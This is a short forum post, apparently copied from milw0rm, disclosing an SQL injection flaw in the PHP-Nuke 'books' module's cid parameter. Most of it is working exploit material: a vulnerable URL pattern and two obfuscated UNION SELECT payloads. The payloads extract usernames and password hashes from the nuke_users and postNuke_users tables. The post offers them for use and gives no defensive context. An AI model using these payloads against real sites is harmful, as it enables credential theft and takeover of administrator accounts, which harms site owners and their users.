19.02.2008, 00:29
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме:
515368
Репутация:
135
|
|
PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability
example
Код:
http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid={exploit}
EXPLOIT 1 :
Код:
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201
EXPLOİT 2 :
Код:
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201
(c)milw0rm.com
|
|
|